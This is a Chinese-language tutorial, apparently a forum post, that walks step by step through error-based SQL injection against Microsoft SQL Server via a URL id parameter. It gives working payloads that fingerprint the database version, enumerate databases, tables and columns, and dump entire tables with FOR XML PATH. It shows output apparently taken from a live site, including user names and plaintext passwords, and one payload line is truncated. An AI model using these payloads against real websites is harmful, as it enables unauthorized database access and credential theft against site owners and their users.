0x01判斷數據
①判斷數據庫類型
and exists (select * from sysobjects)--返回正常為mssql(也名sql server)
and exists (select count(*) from sysobjects)--有時上面那個語句不行就試試這個哈
②判斷數據庫版本
返回正確mssql數據庫
0X02判斷數據庫版本
?id=1 and 1=@@version—
?id=1 and substring((select @@version),22,4)='2008'—
--適用於無回顯模式,后面的2008就是數據庫版本,返回正常就是2008的復制代碼第一條語句執行效果圖(類似):第二條語句執行效果圖:(如果是2008的話就返回正常)
0X03獲取所有數據庫的個數
and 1=(select quotename(count(name)) from master..sysdatabases)—
2. and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) --
3. and 1=(select str(coun、 and 1=(select quotename(count(name)) from master..sysdatabases where dbid>5)--
and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>5) --
and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5) --
說明:dbid從1-4的數據庫一般為系統數據庫.
0x05獲取數據庫
and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))—
and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))—
0x06獲取當前數據庫
and db_name()>0
and 1=(select db_name())—
0X07
⑦獲取當前數據庫中的表(有2個語句可供選擇使用)【下列語句可一次爆數據庫所有表(只限於mssql2005及以上版本)】
and 1=(select quotename(name) from 數據庫名..sysobjects where xtype='U' FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from 數據庫名..sysobjects where xtype='U' FOR XML PATH(''))--復制代碼測試效果圖:得到 3個敏感的表:Whir_Sec_Users/Whir_Mem_Member/Whir_Mem_MemberGroup
[ahcmd][Siwebtmp][admin]
0X08
⑧獲得表里的列一次爆指定表的所有列(只限於mssql2005及以上版本):
and 1=(select quotename(name) from 數據庫名..syscolumns where id =(select id from 數據庫名..sysobjects where name='指定表名') FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from 數據庫名..syscolumns where id =(select id from 數據庫名..sysobjects where name='指定表名') FOR XML PATH(''))--
效果圖:既然有賬戶信息,我就不管是不是管理員的的了,我帖子的目的不是為了得到管理員的信息,只是為了演示可以通過這個方法來獲取相關信息。
[id][name][password][home]
0X09爆字段
⑨獲取指定數據庫中的表的列的數據庫逐條爆指定表的所有字段的數據(只限於mssql2005及以上版本):
and 1=(select top 1 * from 指定數據庫..指定表名 where排除條件 FOR XML PATH(''))--
一次性爆N條所有字段的數據(只限於mssql2005及以上版本):
and 1=(select top N * from 指定數據庫..指定表名 FOR XML PATH(''))--復制代碼第一條語句:and 1=(select top 1 * from 指定數據庫..指定表名 FOR XML PATH(''))--測試效果圖:----------------------------------加上where條件篩選結果出來會更加好,如:where and name like '%user%' 就會篩選出含有user關鍵詞的出來。用在篩選表段時很不錯。
注意:在使用一次獲取數據庫信息的語句時,請使用火狐瀏覽器,筆者測試 IE8、360急速瀏覽器、獵豹瀏覽器均卡死,火狐瀏覽器也會導致出現幾秒鍾的卡死,彈出框框,我們點擊“停止腳本”就會得到初步解決。!!!!!!!!!!!!!!!!!!!!至此,我們已經得到了賬戶信息了,至於管理員的呢,哈哈,大家自行測試時換表啥的就好了。
<id>1</id><name>alex</name><password>HACKER</password><home>LLLAS</home><id>2</id><name>BOM</name><password>QWE123z</password><home>bananqu</home><id>3</id><name>Csle</name><password>hu1982</password><home>jiujinsa</home><id>4</id><name>Fsjam</name><password>qwoe555</password><home>www</home><id>5</id><name>admin</name><password>admin</password><home>admin1111</home>